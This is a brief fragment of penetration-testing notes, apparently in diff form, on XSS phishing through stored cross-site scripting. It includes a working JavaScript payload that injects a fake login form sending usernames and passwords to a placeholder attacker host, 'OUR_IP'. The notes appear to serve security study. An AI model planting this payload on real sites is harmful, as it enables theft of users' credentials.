Cross Site Scripting (XSS)

 XSS Phishing

-• The attacker can inject a fake login form that sends the credentials to an attacker's server,
+Another form of XSS phishing can be obtained by leveraging stored XSS vulnerabilities to inject a fake login form that sends the credentials to our attacker server

 document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');